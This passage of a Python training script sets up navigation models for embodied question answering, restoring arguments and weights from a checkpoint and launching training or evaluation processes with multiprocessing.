    #    exit()
    args.gpus = [0]

    if args.checkpoint_path != False:
        # Restore args from the checkpoint, but let every current CLI value
        # override the stored one except for the keys in args_to_keep.
        print('Loading checkpoint from %s' % args.checkpoint_path)
        logging.info("Loading checkpoint from {}".format(args.checkpoint_path))

        args_to_keep = ['model_type']

        checkpoint = torch.load(args.checkpoint_path, map_location={
            'cuda:0': 'cpu'
        })

        for i in args.__dict__:
            if i not in args_to_keep:
                checkpoint['args'][i] = args.__dict__[i]

        # Plain attribute container built from the merged args dict;
        # downstream code only does attribute reads/writes on it.
        args = type('new_dict', (object, ), checkpoint['args'])

    args.checkpoint_dir = os.path.join(args.checkpoint_dir,
                                       args.time_id + '_' + args.identifier)
    args.log_dir = os.path.join(args.log_dir,
                                args.time_id + '_' + args.identifier)

    # if set to overfit; set eval_split to train
    if args.overfit == True:
        args.eval_split = 'train'

    print(args.__dict__)
    logging.info(args.__dict__)

    # BUG FIX: the original only created args.log_dir when args.checkpoint_dir
    # was missing, so a pre-existing checkpoint dir left the new time-stamped
    # log dir uncreated (and a bare makedirs would raise on an existing dir).
    # Create both idempotently instead.
    os.makedirs(args.checkpoint_dir, exist_ok=True)
    os.makedirs(args.log_dir, exist_ok=True)

    # Build the shared (CPU, shared-memory) model matching -model_type.
    if args.model_type == 'cnn':

        model_kwargs = {}
        shared_model = NavCnnModel(**model_kwargs)

    elif args.model_type == 'cnn+q':

        model_kwargs = {
            'question_input': True,
            'question_vocab': load_vocab(args.vocab_json)
        }
        shared_model = NavCnnModel(**model_kwargs)

    elif args.model_type == 'lstm':

        model_kwargs = {}
        shared_model = NavCnnRnnModel(**model_kwargs)

    elif args.model_type == 'lstm+q':

        model_kwargs = {
            'question_input': True,
            'question_vocab': load_vocab(args.vocab_json)
        }
        shared_model = NavCnnRnnModel(**model_kwargs)

    elif args.model_type == 'pacman':

        model_kwargs = {'question_vocab': load_vocab(args.vocab_json)}
        shared_model = NavPlannerControllerModel(**model_kwargs)

    else:

        exit()

    shared_model.share_memory()

    resume_epoch = 0
    if args.checkpoint_path != False:
        print('Loading params from checkpoint: %s' % args.checkpoint_path)
        logging.info("Loading params from checkpoint: {}".format(args.checkpoint_path))
        shared_model.load_state_dict(checkpoint['state'])
        resume_epoch = checkpoint['epoch']

    if args.mode == 'eval':

        eval(0, args, shared_model, 20)

    elif args.mode == 'train':

        if args.num_processes > 1:
            processes = []
            for rank in range(0, args.num_processes):
                # BUG FIX: propagate resume_epoch (the original dropped it in
                # this branch, so resumed multi-process runs restarted at
                # epoch 0 while single-process runs resumed correctly).
                p = mp.Process(target=train,
                               args=(rank, args, shared_model, resume_epoch))
                p.start()
                processes.append(p)

            for p in processes:
                p.join()

        else:
            train(0, args, shared_model, resume_epoch = resume_epoch)

    else:
        # 'train+eval': training processes are ranked 1..num_processes so
        # rank 0 stays reserved for the (currently disabled) eval process.
        processes = []

        # Start the eval thread
        #p = mp.Process(target=eval, args=(0, args, shared_model))
        #p.start()
        #processes.append(p)

        # Start the training thread(s)
        for rank in range(1, args.num_processes + 1):
            # for rank in range(0, args.num_processes):
            p = mp.Process(target=train, args=(rank, args, shared_model, resume_epoch))
            p.start()
            processes.append(p)

        for p in processes:
            p.join()